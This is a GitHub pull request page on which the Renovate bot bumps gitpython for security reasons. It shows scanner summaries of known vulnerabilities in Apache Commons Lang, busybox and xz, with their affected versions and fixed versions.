Description

Uncontrolled Recursion vulnerability in Apache Commons Lang.

This issue affects Apache Commons Lang: Starting with commons-lang:commons-lang 2.0 to 2.6, and, from org.apache.commons:commons-lang3 3.0 before 3.18.0.

The methods ClassUtils.getClass(...) can throw StackOverflowError on very long inputs. Because an Error is usually not handled by applications and libraries, a StackOverflowError could cause an application to stop.

Users are recommended to upgrade to version 3.18.0, which fixes the issue.

critical: 0 high: 0 medium: 1 low: 0 busybox 1.37.0-r30 (apk)

pkg:apk/alpine/busybox@1.37.0-r30?os_name=alpine&os_version=3.23

medium : CVE--2025--60876

Affected range<=1.37.0-r30
Fixed versionNot Fixed
EPSS Score0.051%
EPSS Percentile16th percentile
Description
critical: 0 high: 0 medium: 0 low: 1 xz 5.8.2-r0 (apk)

pkg:apk/alpine/xz@5.8.2-r0?os_name=alpine&os_version=3.23

low : CVE--2026--34743

Affected range<5.8.3-r0
Fixed version5.8.3-r0
EPSS Score0.060%
EPSS Percentile19th percentile
Description

@renovate renovate Bot changed the title chore(deps): update dependency gitpython to v3.1.47 [security] chore(deps): update dependency gitpython to v3.1.48 [security] May 6, 2026
@renovate
renovate Bot force-pushed the renovate/pypi-gitpython-vulnerability branch 2 times, most recently from a6eed11 to 2d4e7c5 Compare May 7, 2026 00:53
@renovate renovate Bot changed the title chore(deps): update dependency gitpython to v3.1.48 [security] chore(deps): update dependency gitpython to v3.1.49 [security] May 7, 2026
@renovate renovate Bot changed the title chore(deps): update dependency gitpython to v3.1.49 [security] chore(deps): update dependency gitpython to v3.1.50 [security] May 9, 2026
@renovate
renovate Bot force-pushed the renovate/pypi-gitpython-vulnerability branch from 2d4e7c5 to 085c776 Compare May 9, 2026 01:13
@sonarqubecloud

sonarqubecloud Bot commented May 9, 2026

Copy link
Copy Markdown

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Projects

None yet

Development

Successfully merging this pull request may close these issues.

0 participants